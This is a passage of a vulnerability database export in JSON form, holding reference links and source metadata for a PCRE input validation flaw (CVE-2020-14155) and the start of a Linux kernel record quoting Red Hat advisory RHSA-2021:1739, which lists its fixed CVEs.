"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27645"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36331"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20095"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25014"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25009"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3481"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36330"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25010"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-42771"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-17541"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25012"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36332"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43527"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25013"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-31535"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-28493"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37750"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3733"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33938"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33929"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33928"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-22946"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33930"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-22947"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-20673"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-39293"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28153"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28327"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44225"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32250"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1586"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43818"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26945"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-4189"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38593"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24407"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2097"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3634"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-19131"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3696"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24921"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38185"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23648"
},
{
"trust": 0.1,
"url": "https://github.com/util-linux/util-linux/commit/eab90ef8d4f66394285e0cff1dfc0a27242c05aa"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-4156"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5069"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28733"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27191"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29162"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35492"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3672"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23772"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1621"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3737"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30321"
},
{
"trust": 0.1,
"url": "https://10.0.0.7:2379"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21698"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1292"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3697"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1706"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28734"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28737"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30322"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3695"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25314"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28735"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1215"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1729"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41190"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29810"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26691"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24903"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-4115"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23773"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24675"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30323"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0778"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4373"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27823"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35524"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3575"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30758"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14145"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30665"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30689"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30682"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-18032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1801"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1765"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-4658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26927"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27918"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1788"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30744"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21775"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27814"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36241"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30797"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4658"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1799"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21779"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29623"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3948"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27828"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1871"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30734"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35523"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26926"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28650"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30799"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0202"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25648"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-34558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43267"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-0512"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0512"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20317"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20317"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4914"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25648"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36222"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28950"
},
{
"trust": 0.1,
        "url": "https://issues.jboss.org/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23343"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-32690"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4902"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23343"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3801"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26301"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26301"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28957"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20095"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28493"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-26691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13950"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-26690"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17567"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35452"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26691"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26690"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4614"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30641"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30641"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17567"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13950"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35452"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3712"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3445"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3580"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33574"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3200"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33560"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29923"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38297"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-167005"
},
{
"db": "PACKETSTORM",
"id": "168042"
},
{
"db": "PACKETSTORM",
"id": "164825"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "164927"
},
{
"db": "PACKETSTORM",
"id": "165862"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
},
{
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-167005"
},
{
"db": "PACKETSTORM",
"id": "168042"
},
{
"db": "PACKETSTORM",
"id": "164825"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "164927"
},
{
"db": "PACKETSTORM",
"id": "165862"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
},
{
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-15T00:00:00",
"db": "VULHUB",
"id": "VHN-167005"
},
{
"date": "2022-08-10T15:56:22",
"db": "PACKETSTORM",
"id": "168042"
},
{
"date": "2021-11-10T17:02:34",
"db": "PACKETSTORM",
"id": "164825"
},
{
"date": "2022-01-20T17:48:29",
"db": "PACKETSTORM",
"id": "165631"
},
{
"date": "2021-12-03T16:41:45",
"db": "PACKETSTORM",
"id": "165135"
},
{
"date": "2021-12-02T16:06:16",
"db": "PACKETSTORM",
"id": "165129"
},
{
"date": "2021-11-29T18:12:32",
"db": "PACKETSTORM",
"id": "165096"
},
{
"date": "2021-11-11T14:53:11",
"db": "PACKETSTORM",
"id": "164927"
},
{
"date": "2022-02-04T17:26:39",
"db": "PACKETSTORM",
"id": "165862"
},
{
"date": "2020-06-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-1036"
},
{
"date": "2020-06-15T17:15:10.777000",
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-12-03T00:00:00",
"db": "VULHUB",
"id": "VHN-167005"
},
{
"date": "2023-07-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-1036"
},
{
"date": "2024-11-21T05:02:45.440000",
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "PCRE Input validation error vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
}
],
"trust": 0.6
}
}
VAR-202103-0287
Vulnerability from variot - Updated: 2026-03-09 21:38
A flaw, a possible race condition and incorrect initialization of the process ID, was found in the Linux kernel's child/parent process identification handling while filtering signal handlers. A local attacker is able to abuse this flaw to bypass checks and send any signal to a privileged process. The Linux kernel contains an initialization vulnerability. Information may be obtained, information may be tampered with, and service may be disrupted (DoS).
====================================================================
Red Hat Security Advisory
Synopsis: Important: kernel-rt security and bug fix update
Advisory ID: RHSA-2021:1739-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2021:1739
Issue date: 2021-05-18
CVE Names: CVE-2019-19523 CVE-2019-19528 CVE-2020-0431 CVE-2020-11608 CVE-2020-12114 CVE-2020-12362 CVE-2020-12464 CVE-2020-14314 CVE-2020-14356 CVE-2020-15437 CVE-2020-24394 CVE-2020-25212 CVE-2020-25284 CVE-2020-25285 CVE-2020-25643 CVE-2020-25704 CVE-2020-27786 CVE-2020-27835 CVE-2020-28974 CVE-2020-35508 CVE-2021-0342
====================================================================
1. Summary:
An update for kernel-rt is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Real Time (v. 8) - x86_64 Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es):
- kernel: Integer overflow in Intel(R) Graphics Drivers (CVE-2020-12362)
- kernel: use-after-free caused by a malicious USB device in the drivers/usb/misc/adutux.c driver (CVE-2019-19523)
- kernel: use-after-free bug caused by a malicious USB device in the drivers/usb/misc/iowarrior.c driver (CVE-2019-19528)
- kernel: possible out of bounds write in kbd_keycode of keyboard.c (CVE-2020-0431)
- kernel: DoS by corrupting mountpoint reference counter (CVE-2020-12114)
- kernel: use-after-free in usb_sg_cancel function in drivers/usb/core/message.c (CVE-2020-12464)
- kernel: buffer uses out of index in ext3/4 filesystem (CVE-2020-14314)
- kernel: Use After Free vulnerability in cgroup BPF component (CVE-2020-14356)
- kernel: NULL pointer dereference in serial8250_isa_init_ports function in drivers/tty/serial/8250/8250_core.c (CVE-2020-15437)
- kernel: umask not applied on filesystem without ACL support (CVE-2020-24394)
- kernel: TOCTOU mismatch in the NFS client code (CVE-2020-25212)
- kernel: incomplete permission checking for access to rbd devices (CVE-2020-25284)
- kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c (CVE-2020-25285)
- kernel: improper input validation in ppp_cp_parse_cr function leads to memory corruption and read overflow (CVE-2020-25643)
- kernel: perf_event_parse_addr_filter memory (CVE-2020-25704)
- kernel: use-after-free in kernel midi subsystem (CVE-2020-27786)
- kernel: child process is able to access parent mm through hfi dev file handle (CVE-2020-27835)
- kernel: slab-out-of-bounds read in fbcon (CVE-2020-28974)
- kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting ->real_parent (CVE-2020-35508)
- kernel: use after free in tun_get_user of tun.c could lead to local escalation of privilege (CVE-2021-0342)
- kernel: NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs in drivers/media/usb/gspca/ov519.c (CVE-2020-11608)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.4 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1783434 - CVE-2019-19523 kernel: use-after-free caused by a malicious USB device in the drivers/usb/misc/adutux.c driver
1783507 - CVE-2019-19528 kernel: use-after-free bug caused by a malicious USB device in the drivers/usb/misc/iowarrior.c driver
1831726 - CVE-2020-12464 kernel: use-after-free in usb_sg_cancel function in drivers/usb/core/message.c
1833445 - CVE-2020-11608 kernel: NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs in drivers/media/usb/gspca/ov519.c
1848652 - CVE-2020-12114 kernel: DoS by corrupting mountpoint reference counter
1853922 - CVE-2020-14314 kernel: buffer uses out of index in ext3/4 filesystem
1868453 - CVE-2020-14356 kernel: Use After Free vulnerability in cgroup BPF component
1869141 - CVE-2020-24394 kernel: umask not applied on filesystem without ACL support
1877575 - CVE-2020-25212 kernel: TOCTOU mismatch in the NFS client code
